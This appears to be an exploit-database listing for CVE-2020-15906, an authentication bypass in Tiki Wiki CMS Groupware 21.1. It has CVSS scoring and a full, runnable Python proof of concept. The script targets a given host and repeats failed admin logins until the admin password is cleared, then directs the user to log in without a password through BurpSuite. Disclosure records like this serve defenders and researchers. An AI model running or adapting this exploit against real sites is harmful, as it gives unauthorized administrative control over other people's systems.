Lucene search

Maximilian BarzEDB-ID:48927

HistoryOct 21, 2020 - 12:00 a.m.

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass

2020-10-2100:00:00

Maximilian Barz

www.exploit-db.com

5150

exploit

maximilian barz

tiki

authentication

bypass

vulnerability

security

cms

groupware

vendor

software

version

kali linux

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.009

Percentile

83.1%

JSON

# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64

#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys

banner = ''' 

████████ ██ ██   ██ ██ ██     ██ ██ ██   ██ ██     ██████   ██    ██                                                                                                    
   ██    ██ ██  ██  ██ ██     ██ ██ ██  ██  ██          ██ ███   ███                                                                                                    
   ██    ██ █████   ██ ██  █  ██ ██ █████   ██      █████   ██    ██                                                                                                    
   ██    ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██     ██       ██    ██                                                                                                    
   ██    ██ ██   ██ ██  ███ ███  ██ ██   ██ ██     ███████  ██ ██ ██                                                                                                    
                                                                                                                                                                        
                                                                                                                                                                        
 █████  ██    ██ ████████ ██   ██ ███████ ███    ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███    ██         ██████  ██    ██ ██████   █████  ███████ ███████ 
██   ██ ██    ██    ██    ██   ██ ██      ████   ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████   ██         ██   ██  ██  ██  ██   ██ ██   ██ ██      ██      
███████ ██    ██    ██    ███████ █████   ██ ██  ██    ██    ██ ██      ███████    ██    ██ ██    ██ ██ ██  ██         ██████    ████   ██████  ███████ ███████ ███████ 
██   ██ ██    ██    ██    ██   ██ ██      ██  ██ ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ██  ██ ██         ██   ██    ██    ██      ██   ██      ██      ██ 
██   ██  ██████     ██    ██   ██ ███████ ██   ████    ██    ██  ██████ ██   ██    ██    ██  ██████  ██   ████         ██████     ██    ██      ██   ██ ███████ ███████ 
                                                                                                                                                                        
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''




def main():
    if(len(sys.argv) < 2):
        print(banner)
        print("Usage: %s <host> " % sys.argv[0])
        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
        return


    rhost = sys.argv[1]
    url = "http://"+rhost+"/tiki/tiki-login.php"

    session = requests.Session()

    def get_ticket():
        r = requests.get(url)
        login_page = r.text.encode('utf-8') 
        html = lxml.html.fromstring(login_page) 
        auth = html.xpath('//input[@name="ticket"]/@value')

        return str(auth)[2:-2]

    def get_cookie():
        session.get(url)
        return session.cookies.get_dict()


    cookie = get_cookie()
    ticket = get_ticket()
    
    payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
    headers = {
        'Host': rhost,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzrhost, deflate',
        'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '125',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0',
    }


    for i in range(60):
        r = session.post(url, payload, headers)
        if("Account requires administrator approval." in r.text):
            print("Admin Password got removed.")
            print("Use BurpSuite to login into admin without a password ")



if(__name__ == '__main__'):
    main()